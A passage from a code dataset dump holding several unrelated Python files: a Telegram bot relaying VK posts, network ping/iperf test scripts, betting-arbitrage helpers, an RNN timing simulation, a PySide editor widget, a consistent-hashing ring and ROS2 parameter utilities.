text,\n\t\t\t\tVehicleRef text,\n\t\t\t\tStopPointRef text,\n\t\t\t\tVisitNumber text,\n\t\t\t\tStopPointName text\n\t\t\t); \n\t\t\"\"\")\n\ndef main():\n\tlogging.basicConfig()\n\tclient = SimpleClient()\n\tclient.connect(['152.94.123.92'])\n\tclient.create_schema()\n\ttime.sleep(1)\n\tclient.close()\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"KVMDBCC.py","file_name":"KVMDBCC.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"25460918","text":"from __future__ import print_function\nimport sys\nimport time\nimport telepot\nimport random\nimport datetime\nimport requests\nimport json\nimport os\nimport subprocess\nfrom multiprocessing import Process\n\ndef TokenInput():\n\t\"\"\"Ввод токена из файла.\"\"\"\n\twith open('token', 'r') as file:\n\t\toutput = file.read().replace('\\n', '')\n\treturn output\n\nbot = telepot.Bot(TokenInput()) \n\"\"\"Основа бота, через которую и будем отсылать сообщения.\"\"\"\n\ndef On(chat_id):\n\tread = {}\n\tread[str(chat_id)] = True\n\tjson.dump(read, open(\"to_send\",'w'))\n\tvk = open('vk', 'w')\n\tvk.write(str(0))\n\tvk.close()\n\ttime.sleep(3)\n\tp = Process(target=VkCheck)\n\tp.start()\n\ncommands = { 'on' : On }\n\"\"\"Dict для хранения команд. \nНа первом месте текст команды, на втором функция, обрабатывающая команду.\"\"\"\n\ndef handle(msg):\n\tprint(\"----------------------------------------\")\n\t\"\"\"Обработка всех сообщений.\"\"\"\n\tcontent_type, chat_type, chat_id = telepot.glance(msg)\n\n\tt = datetime.datetime.now()\n\tprint(t.strftime(\"%d %B %I:%M%p\"))\n\tprint(content_type, chat_type, chat_id)\n\t#print(msg)\n\n\tOn(msg['chat']['id'])\n\t\ndef VkCheck():\n\twhile True:\n\t\te = \"\"\n\t\ttry:\n\t\t\tVkPost()\n\t\t\ttime.sleep(300)\n\t\texcept e as Exception:\n\t\t\tprint(\"Failed\")\n\t\t\tprint(e)\n\t\t\ttime.sleep(10)\n\ndef VkPost():\n\ttry:\n\t\tdata = (requests.get(\"https://api.vk.com/method/wall.get?owner_id=-20301834&count=2\")).json()['response']\n\t\tvk = open('vk', 'r')\n\t\tPrevPost = vk.read()\n\t\tvk.close()\n\t\tif int(PrevPost) != data[2]['id']:\n\t\t\tprint(\"----------------------------------------\")\n\t\t\tprint(data[2]['id'])\n\t\t\tvk = open('vk', 'w')\n\t\t\tvk.write(str(data[2]['id']))\n\t\t\tvk.close()\n\t\t\t\"\"\"Запоминаем id последнего поста\"\"\"\n\n\t\t\tText = \"\"\n\t\t\n\t\t\tif (data[2]['text'] != None):\n\t\t\t\tText = data[2]['text'] + \"\\n\\n\" + \"' + \"Обсудить новость в вк\"\n\t\t\t\tText = Text.replace(\"
    \", \"\\n\")\n\t\t\t\twhile Text.find('[id') != -1 or Text.find('[club') != -1:\n\t\t\t\t\tText = Text.replace(Text[Text.find('['):Text.find(']')+1], '' + Text[Text.find('|') + 1 : Text.find(']')] + \"\")\n\t\t\t\n\t\t\t\tread = json.load(open(\"to_send\"))\n\t\t\t\t\"\"\"Чтение списка подписанных\"\"\"\n\n\t\t\t\tcounter = 0\n\t\t\t\tfor readed in read:\n\t\t\t\t\tif (read[readed]):\n\t\t\t\t\t\tprint(\"send to \" + readed)\n\t\t\t\t\t\tt = datetime.datetime.now()\n\t\t\t\t\t\tprint(t.strftime(\"%d %B %I:%M%p\"))\n\t\t\t\t\t\tbot.sendMessage(readed, Text, \"HTML\", True)\n\texcept Exception as e:\n\t\tprint(e)\n\ndef Main():\n\tbot.getUpdates(offset=0)\n\tbot.message_loop(handle)\n\tprint ('Listening ...')\n\t# Keep the program running.\n\twhile 1:\n\t\ttime.sleep(10)\n\nif __name__ == '__main__':\n\t Main()\n","sub_path":"esforcebot/esforcebot.py","file_name":"esforcebot.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"410953993","text":"import os\nfrom sys import platform\n\nimport Common_Function as cf\nimport Configuration as conf\n\n# Creating a Directory to store Log Files\nif not os.path.exists(conf.Log_Directory):\n os.mkdir(conf.Log_Directory)\n print(\"Directory \", conf.Log_Directory, \" Created \")\nelse:\n print(\"Directory \", conf.Log_Directory, \" already exists\")\n\n# Creating list of ping commands\nlis = []\nfor addr in conf.url_list:\n File_Name = conf.Log_Directory + '/' + \"Log_\" + addr + \".txt\"\n if platform == \"linux\" or platform == \"linux2\":\n ping_cmd = \"ping \" + addr + \"|./Requirements/TimeStamp.sh|tee \" + File_Name\n elif platform == \"win32\":\n ping_cmd = \"hrping -n \" + conf.ping_packets + \" -T -F \" + File_Name + \" \" + addr \n lis.append(ping_cmd)\n\n# Pinging GW and the websites\ncf.command_execution(lis)\n\n# Exexcuting ipref commands\ncf.command_execution(conf.iperf_list)\n\n# Opening VLC given VLC in Environ Path\ncf.command_execution([conf.vlc_command])\n\n# Opening youtube\ncf.openBrowser(conf.Youtube_url_list, conf.browsercode)\n","sub_path":"Satellite-Ethernet-Backend-Client/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"310339323","text":"import pandas\nimport itertools\nimport numpy as np\nimport os\nimport time\nimport smtplib\n\n\ndef odds_to_percent(odds):\n if odds >= 0:\n return 100. / (odds + 100)\n else:\n return odds / (odds - 100.)\n\n\ndef find_arbitrage(df, convert_odds=False, threshold=0.):\n df = df.copy(deep=True)\n \n # Convert odds to percents\n percents = df.drop(\"timestamp\", axis=1).applymap(odds_to_percent)\n\n profits = percents.apply(arbitrage_profit, axis=1)\n\n if convert_odds:\n df.iloc[:, 1:] = percents.applymap(lambda x: round(x, 2))\n \n df['profits'] = profits\n return df[profits >= threshold]\n\n\ndef arbitrage_profit(row): \n # Find every permutation of sites to search for an arbitrage situation\n # Perms are indicies\n # assumes structure is like so: Bovada A, Bovada B, Pinnacle A, Pinnacle B, ....\n\n num_sites = len(row) / 2 \n perms = list(itertools.permutations(np.arange(num_sites), 2))\n for i, perm in enumerate(perms):\n perms[i] = perm[0], perm[1] + num_sites\n\n arb_probs = [row.iloc[list(perm)].sum(skipna=False) for perm in perms]\n arb_probs = [prob for prob in arb_probs if ~np.isnan(prob)]\n\n if len(arb_probs) > 0:\n best = np.argmin(arb_probs)\n return 1. / arb_probs[best] - 1\n else:\n return np.nan\n\n \n\n\n","sub_path":"arbUtil.py","file_name":"arbUtil.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"343438528","text":"#Code written by Cristian Buc Calderon\r\n#This code implements a RNN connected to a motor node\r\n#The weights from RNN to motor read out the reservor dynamics\r\n#and learn to produce an action at a specific point in times\r\n#using reward-modulated hebbian learning\r\n\r\n##to do list\r\n#maybe in how strong the feedback weights!\r\n\r\nimport numpy as np, matplotlib.pyplot as plt, scipy as sc, os\r\nfrom scipy.sparse import random\r\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\r\nimport copy\r\nimport random as rd\r\n\r\n\r\nos.chdir('C:/Cris/VoT Project/Feedback-Driven-Self-Organization/Cris way/noisy space')\r\n\r\n###Intialization parameters\r\nshow_pic = 1\r\nsave_pic = 0\r\nN_E_rnn = 200\r\nN_motor = 6\r\ntime = 1000\r\ntau_E = 1\r\ntau_I = 1/1\r\ntau_G = 1/1000\r\ntau_A = 1/10\r\ntau_N = 1/10\r\ntau_w = 1/2\r\nN_trials = 1\r\nk_a = 1\r\nk_g = 1\r\nk_n = 0\r\nk_rnn_e = 1\r\nk_rnn_i = 1\r\nbias = 0.4\r\ngain_A_I = 21\r\ngain_A_RNN = 21.4\r\n\r\n###opening storing arrays\r\nRNN_units = np.zeros((N_trials,time,N_E_rnn))\r\nsd_units = np.zeros((N_trials,time,N_E_rnn))\r\nG_units = np.zeros((N_trials,time+1,N_motor))\r\nA_units = np.zeros((N_trials,time+1,N_motor))\r\nN_units = np.zeros((N_trials,time+1,N_motor))\r\nI_units = np.ones((N_trials,time+1))\r\ntest = np.ones((N_trials,time+1))\r\n\r\n\r\n###Loading weight matrices and desired times\r\nW_rnn_E_E = np.loadtxt('RNN_weights.txt', delimiter=',')\r\nW_shut = np.loadtxt('W_shut.txt', delimiter=',')\r\nW_feedback = np.loadtxt('Feedback_weights.txt', delimiter=',')\r\nW_go = np.loadtxt('RNN_Go_weights.txt', delimiter=',')\r\nW_a = np.loadtxt('Go_A_weights.txt', delimiter=',')\r\nW_n = np.loadtxt('A_N_weights.txt', delimiter=',')\r\nW_g_inh = np.loadtxt('G_inh_weights.txt', delimiter=',')\r\nW_inh = np.loadtxt('N_G_inh_weights.txt', delimiter=',')\r\ninputs = np.loadtxt('Inputs_weights.txt', delimiter=',')\r\njEI = np.loadtxt('I_E_weights.txt', delimiter=',')\r\njIE = np.loadtxt('E_I_weights.txt', delimiter=',')\r\ntimes = np.loadtxt('Times.txt', delimiter=',')\r\n\r\n\r\nlamb = 10\r\ndef tanh_f(x,lamb):\r\n z = ((2/(1 + np.exp(-lamb*x)))-1)\r\n z[z<0] = 0\r\n return z\r\n\r\ndef tanh_f_s(x,lamb):\r\n z = ((2/(1 + np.exp(-lamb*x)))-1)\r\n if z < 0:\r\n z = 0\r\n return z\r\n\r\ndef tanh_eli(x):\r\n lambd = 10\r\n d= 2.5\r\n z = d/(1 + np.exp((-lambd*x) + 5))\r\n z[z<0.02] = 0\r\n return z\r\n\r\n\r\n#noise sd\r\nsd_i = 0\r\nsd_rnn = 0\r\nsd_g = 0\r\nsd_a = 0\r\nsd_n = 0\r\n\r\n#global input to g\r\ngain_to_G = np.linspace(0.9,1.2,100) #set to any positive number to accelerate the sequence\r\n\r\n#record ratio\r\nrecord_ratio = np.zeros(len(gain_to_G))\r\n\r\nfor u in range(len(gain_to_G)):\r\n print(u)\r\n for i in range(N_trials):\r\n\r\n ### initial state\r\n rnn_E = np.zeros(N_E_rnn)\r\n rnn_I = 0. #1.\r\n G = np.zeros(N_motor)\r\n A = np.zeros(N_motor)\r\n N = np.zeros(N_motor)\r\n\r\n\r\n ### dynamics loop\r\n for j in range(time):\r\n\r\n ### RNN layer\r\n lamb = 10\r\n rnn_i_exc = np.dot(jIE,rnn_E) + np.dot(W_shut,A*gain_A_I) + np.random.normal(0,sd_i,1)\r\n rnn_I += (-k_rnn_i*rnn_I + (rnn_i_exc)) * tau_I\r\n\r\n rnn_e_exc = np.dot(W_rnn_E_E,rnn_E) - (jEI*rnn_I) + (inputs[:,j]) + (np.dot(W_feedback,A*gain_A_RNN))\r\n rnn_E += (-k_rnn_e*rnn_E + tanh_f(rnn_e_exc,lamb) + np.random.normal(0,sd_rnn,N_E_rnn)) * tau_E\r\n rnn_E[rnn_E>1] = 1\r\n rnn_E[rnn_E<0] = 0\r\n\r\n ### G layer\r\n g_exc = (np.dot(W_go,rnn_E) - np.dot(W_inh,N) - np.dot(W_g_inh,G))*gain_to_G[u] #if single gain then gain_to_G\r\n #if j <100:\r\n #g_exc[0] += -1 #for window shift\r\n G += (-k_g*G + g_exc + (np.random.normal(0,sd_g,N_motor))) * tau_G\r\n G[G<0]=0\r\n\r\n ### A layer\r\n lamb = 10000\r\n a_exc = np.dot(W_a,G) - bias\r\n A += (-k_a*A + tanh_f(a_exc,lamb) + np.random.normal(0,sd_a,N_motor)) * tau_A\r\n A[A<0]=0\r\n\r\n ### N Layer\r\n n_exc = np.dot(W_n,A) #* gain_to_N\r\n N += (-k_n*N + n_exc + (np.random.normal(0,sd_n,N_motor))) * tau_N\r\n N[N<0]=0\r\n\r\n ### storing dynamics\r\n A_units[i,j+1,:] = A\r\n\r\n\r\n #quantifying the structure of the sequence (see paper)\r\n tot_ratio = 0\r\n for yy in range(N_motor-2):\r\n first_dif = np.abs(np.argwhere(A_units[0,:,yy]>0.5)[0][0] - np.argwhere(A_units[0,:,yy+1]>0.5)[0][0])\r\n second_dif = np.abs(np.argwhere(A_units[0,:,yy+1]>0.5)[0][0] - np.argwhere(A_units[0,:,yy+2]>0.5)[0][0])\r\n\r\n ratio = second_dif / first_dif\r\n tot_ratio = tot_ratio + ratio\r\n\r\n record_ratio[u]=tot_ratio\r\n\r\n\r\n\r\nplt.figure(figsize=(10,6))\r\nplt.scatter(gain_to_G,record_ratio,s=350,color='k',marker='o',facecolors=\"none\")\r\nplt.ylim(0,15)\r\nplt.yticks(fontsize=20)\r\nplt.xticks(fontsize=20)\r\nplt.xlabel('Mulitplicative input value (ρ)', fontsize=22)\r\nplt.ylabel('Sum of ratios', fontsize=22)\r\nplt.title('Temporal rescaling maintains structure',fontsize=30,y=1.05)\r\nplt.savefig('relative_rescaling.png', dpi=500, bbox_inches='tight')\r\nplt.show()\r\n","sub_path":"Simulation 4 - Temporal rescaling - structure.py","file_name":"Simulation 4 - Temporal rescaling - structure.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"487984268","text":"\n\"\"\"\nblitwizard Editor\nCopyright (c) 2014 Jonas Thiem\n\nThis software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions:\n\n 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source distribution.\n\"\"\"\n\nimport datetime\nimport sys\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\nfrom lang.lang import l\nfrom core.treemodel.projectfiletreemodel import ProjectFileTreeModel\n\nclass ProjectFileListWidget(QDockWidget):\n PROJECT_INDEX = 0\n CODE_INDEX = 1\n OBJECTS_INDEX = 3\n RESOURCES_INDEX = 4\n SCENES_INDEX = 2\n ALL_INDEX = 5\n def __init__(self, parent, project, on_file_open=None,\n on_visibility_change=None):\n self.no_update_file_list = True\n self.project = project\n self.on_file_open = on_file_open\n \n super(ProjectFileListWidget, self).__init__(\"BLAH\", parent, 0)\n \n if on_visibility_change:\n self.visibilityChanged.connect(lambda: on_visibility_change())\n\n self.layout = QVBoxLayout()\n self.layout.setContentsMargins(0, 0, 0, 0)\n\n self.setWindowTitle(l(\"projwin_filelist_title\"))\n \n self.box = QWidget()\n self.layout.addWidget(self.box)\n \n self.layout_inner = QVBoxLayout()\n self.box.setLayout(self.layout_inner)\n self.combo = QComboBox()\n self.combo.addItem(\"test\")\n self.combo.currentIndexChanged.connect(\\\n self._rebuild_file_list_forget_index)\n self.layout_inner.addWidget(self.combo)\n\n self.file_list = QTreeView(self)\n self.file_list.setMinimumSize(250, 20)\n self.layout_inner.addWidget(self.file_list)\n\n mainwidget = QWidget()\n mainwidget.setLayout(self.layout)\n self.setWidget(mainwidget)\n\n self.rebuild_combo_contents()\n\n self.no_update_file_list = False\n self._rebuild_file_list_forget_index()\n \n def get_category(self):\n \"\"\" Get the category that is currently in use for viewing\n the selected file:\n \"project\", \"code\", \"objects\", \"resources\", \"scenes\", \"all\"\n \"\"\"\n index = self.combo.currentIndex()\n if index == self.PROJECT_INDEX:\n return \"project\"\n elif index == self.CODE_INDEX:\n return \"code\"\n elif index == self.OBJECTS_INDEX:\n return \"objects\"\n elif index == self.RESOURCES_INDEX:\n return \"resources\"\n elif index == self.SCENES_INDEX:\n return \"scenes\"\n elif index == self.ALL_INDEX:\n return \"all\"\n else:\n raise RuntimeError(\"unknown internal category - internal error\")\n\n def _file_list_open_file(self, index):\n # rate limiting: for some reason, this seems to fire way too often:\n if hasattr(self, \"last_double_click\"):\n if (datetime.datetime.now() - self.last_double_click).total_seconds()\\\n < 0.2:\n # skip, bogus multi-fired event\n return\n self.last_double_click = datetime.datetime.now()\n \n # open up selected item:\n item = self.file_list_model.itemFromIndex(index)\n if not item is None:\n filename = self.file_list_model.filenameFromItem(item)\n if not self.on_file_open is None:\n self.on_file_open(self, filename)\n return True\n \n def _get_index(self):\n current_model_index = self.file_list.currentIndex()\n assert(not current_model_index is None)\n return current_model_index.row()\n \n def _change_index_to(self, index):\n self.file_list.setCurrentIndex(self.file_list_model.\\\n index(index, 0))\n \n def _rebuild_file_list_forget_index(self):\n if self.no_update_file_list:\n return\n title = \"Unknown list\"\n mime_types = None\n index = self.combo.currentIndex()\n if index == self.CODE_INDEX:\n mime_types = [\"text/lua\"]\n title = l(\"projwin_filelist_code_list_title\")\n if index == self.ALL_INDEX:\n title = l(\"projwin_filelist_all_list_title\")\n self.file_list_model = ProjectFileTreeModel(self.project,\n title, mime_types)\n self.file_list.setModel(self.file_list_model)\n selection_model = self.file_list.selectionModel()\n self.file_list.doubleClicked.connect(\\\n self._file_list_open_file)\n self._change_index_to(0)\n return\n\n def rebuild_file_list(self):\n \"\"\" This rebuilds the file list entirely, but attempts to keep the\n current file selected. If that is not possible, none will be\n selected.\n Call this when a file was removed or added to the project (or\n renamed).\n \"\"\"\n oldindex = self._get_index()\n assert(not oldindex is None)\n if oldindex < 0:\n self._change_index_to(-1)\n oldfilename = self.file_list_model.filenameFromItem(\n self.file_list_model.itemFromIndex(self.file_list.currentIndex()))\n self._rebuild_file_list_forget_index()\n i = 0\n while i < self.file_list_model.fileEntryListCount():\n if self.file_list_model.filenameFromItem(\n self.file_list_model.itemFromIndex(\\\n self.file_list_model.index(i, 0)))\\\n == oldfilename:\n self._change_index_to(i)\n return\n i = i + 1\n # ok old index wasn't found. change to any index:\n self._change_index_to(-1)\n \n def update_file_list(self):\n \"\"\" This doesn't check for new or removed files, but it checks for\n files being changed or no longer changed (dirty flag).\n \"\"\"\n self.file_list_model.updateDirty()\n return\n \n def update_language(self):\n self.setWindowTitle(l(\"projwin_filelist_title\"))\n self.no_update_file_list = True\n self.rebuild_combo_contents()\n self.no_update_file_list = False\n self.rebuild_file_list()\n\n def rebuild_combo_contents(self):\n index = self.combo.currentIndex()\n if index < 0 or self.combo.count() <= 1:\n index = 1\n while self.combo.count() > 0:\n self.combo.removeItem(0)\n self.combo.addItem(l(\"projwin_filelist_project\"))\n self.combo.addItem(l(\"projwin_filelist_code\"))\n self.combo.addItem(l(\"projwin_filelist_scenes\"))\n self.combo.addItem(l(\"projwin_filelist_objects\"))\n self.combo.addItem(l(\"projwin_filelist_resources\"))\n self.combo.addItem(l(\"projwin_filelist_all\"))\n self.combo.setCurrentIndex(index)\n\n","sub_path":"gui/projectfilelistwidget.py","file_name":"projectfilelistwidget.py","file_ext":"py","file_size_in_byte":7338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"385997960","text":"#import sys module\nimport sys\n#assign arguments from argv to 'input_encoding', and 'error'\nscript, input_encoding, error = sys.argv\n\n#Define main\ndef main(language_file, encoding, errors):\n # assign next line in 'language_file' to variable 'line'\n line = language_file.readline()\n#if line has text in it...\n if line:\n #run function 'print_line' with args: 'line', 'encoding', and 'errors'.\n print_line(line, encoding, errors)\n #go back to main with the same arguments as before.\n return main(language_file, encoding, errors)\n\n#Define a function called 'print_line'\ndef print_line(line, encoding, errors):\n #remove the whitespace from the text in 'line' and assign it to 'next_lang'\n next_lang = line.strip()\n #encode the text in 'next_lang' with encoding specified in first arg. handle errors as errors. and assign to 'raw_bytes'\n raw_bytes = next_lang.encode(encoding, errors=errors)\n\n #decode string in 'raw_bytes' and assign to 'cooked_string'\n cooked_string = raw_bytes.decode(encoding, errors=errors)\n\n #print a string including 'raw_bytes' and 'cooked_string'\n print(raw_bytes, \"<===>\", cooked_string)\n\n\n#assign file 'languages.txt' with the encoding 'utf-8' to 'languages'\nlanguages = open(\"languages.txt\", encoding=\"utf-8\")\n\n#run main with 'languages' as its 'language_file' argument and 'error' for it's 'errors' argument\nmain(languages, input_encoding, error)\n\n# You have 4 concepts to explore\n# 1.How modern computers store human languages for display and processing and\n# how Python 3 calls these strings.\n# 2.How you must ”encode” and ”decode” Python’s strings into a type called bytes.\n# 3.How to handle errors in your string and byte handling.\n# 4.How to read code and find out what it means even if you’ve never seen it b4\n","sub_path":"ex23/ex23_break.py","file_name":"ex23_break.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"347510976","text":"import bisect\nimport hashlib\nimport pickle\n\nclass ConsistentHashRing(object):\n\n def __init__(self, replica_nodes=100):\n self.replica_nodes = replica_nodes\n self.keys = []\n self.nodes = {}\n\n def get_hash(self, key):\n object_bytes = pickle.dumps(key)\n return hashlib.md5(object_bytes).hexdigest()\n\n def replica_iterator(self, nodename):\n return (self.get_hash(\"%s:%s\" % (nodename, i)) for i in range(self.replica_nodes))\n\n def __setitem__(self, nodename, node):\n for hash_iter in self.replica_iterator(nodename):\n if hash_iter in self.nodes:\n raise ValueError(\"Node already available: %r\" % nodename)\n self.nodes[hash_iter] = node\n bisect.insort(self.keys, hash_iter)\n\n def __delitem__(self, nodename):\n for hash_iter in self.replica_iterator(nodename):\n # will raise KeyError for nonexistent node name\n del self.nodes[hash_iter]\n index = bisect.bisect_left(self.keys, hash_iter)\n del self.keys[index]\n\n def __getitem__(self, key):\n hash_obj = self.get_hash(key)\n start = bisect.bisect(self.keys, hash_obj)\n if start == len(self.keys):\n start = 0\n return self.nodes[self.keys[start]]","sub_path":"consistent_hashing.py","file_name":"consistent_hashing.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421192622","text":"import os\nimport subprocess\n\nfrom util.lib.OS import OS\nfrom util.lib.Util import Util\n\n\nclass Add_babelDecorator:\n def __init__(self, pack):\n try:\n # 打包babel\n f_new_path = pack.watch_file + '_new'\n print(f_new_path)\n f_new_fp = OS.open(f_new_path, 'w')\n f_new_fp.write(''.join(pack.lines))\n f_new_fp.close()\n\n f_babel_path = pack.watch_file + '_babel'\n\n cmd = 'babel %s -o %s' % (f_new_path, f_babel_path)\n child = subprocess.Popen(cmd, shell=True)\n child.wait()\n\n f_babel_fp = OS.open(f_babel_path)\n pack.lines = f_babel_fp.readlines(9999999)\n f_babel_fp.close()\n\n os.remove(f_new_path)\n os.remove(f_babel_path)\n except:\n Util.err()\n","sub_path":"handle_file_content/src/lib/Add_babelDecorator.py","file_name":"Add_babelDecorator.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"609673535","text":"# Copyright 2018 Open Source Robotics Foundation, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nfrom rcl_interfaces.msg import Parameter\nfrom rcl_interfaces.msg import ParameterType\nfrom rcl_interfaces.msg import ParameterValue\nfrom rcl_interfaces.srv import DescribeParameters\nfrom rcl_interfaces.srv import GetParameters\nfrom rcl_interfaces.srv import ListParameters\nfrom rcl_interfaces.srv import SetParameters\nimport rclpy\nfrom rclpy.parameter import PARAMETER_SEPARATOR_STRING\nfrom ros2cli.node.direct import DirectNode\n\nimport yaml\n\n\ndef get_value(*, parameter_value):\n \"\"\"Get the value from a ParameterValue.\"\"\"\n if parameter_value.type == ParameterType.PARAMETER_BOOL:\n value = parameter_value.bool_value\n elif parameter_value.type == ParameterType.PARAMETER_INTEGER:\n value = parameter_value.integer_value\n elif parameter_value.type == ParameterType.PARAMETER_DOUBLE:\n value = parameter_value.double_value\n elif parameter_value.type == ParameterType.PARAMETER_STRING:\n value = parameter_value.string_value\n elif parameter_value.type == ParameterType.PARAMETER_BYTE_ARRAY:\n value = list(parameter_value.byte_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_BOOL_ARRAY:\n value = list(parameter_value.bool_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_INTEGER_ARRAY:\n value = list(parameter_value.integer_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_DOUBLE_ARRAY:\n value = list(parameter_value.double_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_STRING_ARRAY:\n value = list(parameter_value.string_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_NOT_SET:\n value = None\n else:\n value = None\n\n return value\n\n\ndef get_parameter_value(*, string_value):\n \"\"\"Guess the desired type of the parameter based on the string value.\"\"\"\n value = ParameterValue()\n try:\n yaml_value = yaml.safe_load(string_value)\n except yaml.parser.ParserError:\n value.type = ParameterType.PARAMETER_STRING\n value.string_value = string_value\n return value\n\n if isinstance(yaml_value, bool):\n value.type = ParameterType.PARAMETER_BOOL\n value.bool_value = yaml_value\n elif isinstance(yaml_value, int):\n value.type = ParameterType.PARAMETER_INTEGER\n value.integer_value = yaml_value\n elif isinstance(yaml_value, float):\n value.type = ParameterType.PARAMETER_DOUBLE\n value.double_value = yaml_value\n elif isinstance(yaml_value, list):\n if all((isinstance(v, bool) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_BOOL_ARRAY\n value.bool_array_value = yaml_value\n elif all((isinstance(v, int) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_INTEGER_ARRAY\n value.integer_array_value = yaml_value\n elif all((isinstance(v, float) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_DOUBLE_ARRAY\n value.double_array_value = yaml_value\n elif all((isinstance(v, str) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_STRING_ARRAY\n value.string_array_value = yaml_value\n else:\n value.type = ParameterType.PARAMETER_STRING\n value.string_value = string_value\n else:\n value.type = ParameterType.PARAMETER_STRING\n value.string_value = string_value\n return value\n\n\ndef parse_parameter_dict(*, namespace, parameter_dict):\n parameters = []\n for param_name, param_value in parameter_dict.items():\n full_param_name = namespace + param_name\n # Unroll nested parameters\n if type(param_value) == dict:\n parameters += parse_parameter_dict(\n namespace=full_param_name + PARAMETER_SEPARATOR_STRING,\n parameter_dict=param_value)\n else:\n parameter = Parameter()\n parameter.name = full_param_name\n parameter.value = get_parameter_value(string_value=str(param_value))\n parameters.append(parameter)\n return parameters\n\n\ndef load_parameter_dict(*, node, node_name, parameter_dict):\n\n parameters = parse_parameter_dict(namespace='', parameter_dict=parameter_dict)\n response = call_set_parameters(\n node=node, node_name=node_name, parameters=parameters)\n\n # output response\n assert len(response.results) == len(parameters)\n for i in range(0, len(response.results)):\n result = response.results[i]\n param_name = parameters[i].name\n if result.successful:\n msg = 'Set parameter {} successful'.format(param_name)\n if result.reason:\n msg += ': ' + result.reason\n print(msg)\n else:\n msg = 'Set parameter {} failed'.format(param_name)\n if result.reason:\n msg += ': ' + result.reason\n print(msg, file=sys.stderr)\n\n\ndef load_parameter_file(*, node, node_name, parameter_file, use_wildcard):\n # Remove leading slash and namespaces\n with open(parameter_file, 'r') as f:\n param_file = yaml.safe_load(f)\n param_keys = []\n if use_wildcard and '/**' in param_file:\n param_keys.append('/**')\n if node_name in param_file:\n param_keys.append(node_name)\n\n if param_keys == []:\n raise RuntimeError('Param file does not contain parameters for {}, '\n ' only for nodes: {}' .format(node_name, param_file.keys()))\n param_dict = {}\n for k in param_keys:\n value = param_file[k]\n if type(value) != dict or 'ros__parameters' not in value:\n raise RuntimeError('Invalid structure of parameter file for node {}'\n 'expected same format as provided by ros2 param dump'\n .format(k))\n param_dict.update(value['ros__parameters'])\n load_parameter_dict(node=node, node_name=node_name, parameter_dict=param_dict)\n\n\ndef call_describe_parameters(*, node, node_name, parameter_names=None):\n # create client\n client = node.create_client(\n DescribeParameters, f'{node_name}/describe_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = DescribeParameters.Request()\n if parameter_names:\n request.names = parameter_names\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response\n\n\ndef call_get_parameters(*, node, node_name, parameter_names):\n # create client\n client = node.create_client(GetParameters, f'{node_name}/get_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = GetParameters.Request()\n request.names = parameter_names\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response\n\n\ndef call_set_parameters(*, node, node_name, parameters):\n # create client\n client = node.create_client(SetParameters, f'{node_name}/set_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = SetParameters.Request()\n request.parameters = parameters\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response\n\n\ndef call_list_parameters(*, node, node_name, prefix=None):\n # create client\n client = node.create_client(ListParameters, f'{node_name}/list_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = ListParameters.Request()\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response.result.names\n\n\ndef get_parameter_type_string(parameter_type):\n mapping = {\n 